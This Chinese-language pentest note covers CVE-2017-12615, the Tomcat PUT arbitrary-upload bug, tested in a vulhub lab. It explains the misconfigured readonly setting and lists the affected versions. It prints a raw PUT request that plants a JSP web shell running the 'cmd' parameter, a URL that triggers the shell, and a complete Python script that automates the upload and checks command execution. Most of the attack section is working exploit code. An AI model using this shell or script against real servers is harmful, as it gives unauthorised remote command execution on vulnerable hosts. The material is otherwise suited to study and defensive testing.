:::info
💘渗透全流程：
信息收集 – 漏洞发现 – 漏洞👣利用 – 权限提升 – 隧道搭建 – 内网渗透 – 横向移动 – 后渗透
:::

CVE-2017-12615

📚测试环境

vulhub 靶场 CVE-2017-12615 环境。

使用 docker-compose 开启环境

📚漏洞原理

Tomcat 的配置文件 /conf/web.xml 中配置了 readonly=False，导致使用 PUT 请求可以上传任意文件。

📚影响版本

• Tomcat 7.0.0 – 7.0.81
  

  📚POC 示例

  
  PUT /shell.jsp/ HTTP/1.1
  Host: 192.168.225.135:8080
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9
  Connection: close
  Content-Length: 200

<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>

![image.png](https://cdn.nlark.com/yuque/0/2023/png/2654953/1700479270616-3d386283-8b27-4bf4-8b73-b36e6562500f.png#averageHue=%23faf9f9&clientId=u780351bd-2e0e-4&from=paste&height=380&id=uf1bceb15&originHeight=475&originWidth=1919&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=80728&status=done&style=none&taskId=u9bae0fbc-ad39-488c-82fe-1f7a9cca577&title=&width=1535.2)
#### 访问创建的文件
http://192.168.225.135:8080/shell.jsp?cmd=whoami
![image.png](https://cdn.nlark.com/yuque/0/2023/png/2654953/1700479356931-fea60c1d-d6ff-401f-98fa-68157f01b12e.png#averageHue=%23bcc17f&clientId=u780351bd-2e0e-4&from=paste&height=192&id=u932acd2e&originHeight=240&originWidth=1920&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=22931&status=done&style=none&taskId=uad31264c-54f3-46b4-b56f-4f7b192acd5&title=&width=1536)
### ⚠️问题源码
conf/web.xml
## 漏洞利用
### V1.0
```python
'''
CVE-2017-12615

📚漏洞原理
Tomcat 的配置文件 /conf/web.xml 中配置了 readonly=False，导致使用 PUT 请求可以上传任意文件。

📚影响版本
● Tomcat 7.0.0 - 7.0.81

📚POC 示例
PUT /shell.jsp/ HTTP/1.1
Host: 192.168.225.135:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 200

<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>

'''

from urllib.parse import urljoin
import requests
import time
import datetime
from fake_useragent import UserAgent
from rich import print as rprint

ua = UserAgent()
def get_time():
    return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")

def cve_2017_12615(url):
    payload_url = urljoin(url, payload_file)
    headers = {
        'User-Agent': ua.random
    }

    payload_body = (r'<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a = in.read(b)) != -1){ out.println(new String(b));}%>')

    response = requests.put(payload_url + '/', data=payload_body, headers=headers)
    time.sleep(3)

    payload_test = {
        'cmd': 'whoami'
    }
    response = requests.get(payload_url, params=payload_test)

    if response.status_code == 200:
        rprint("[[bold green]" + get_time() + "[/bold green]] [[bold green]Success[/bold green]] > [bold yellow]" + "发现 CVE-2017-12615 漏洞" + "[/bold yellow]")
    else:
        rprint("[[bold red]" + get_time() + "[/bold green]] [[bold red]Error[/bold red]] > [bold yellow]" + "不存在漏洞" + "[/bold yellow]")

if __name__ == '__main__':
    url = 'http://192.168.225.135:8080/'
    payload_file = 'shell5.jsp'
    cve_2017_12615(url)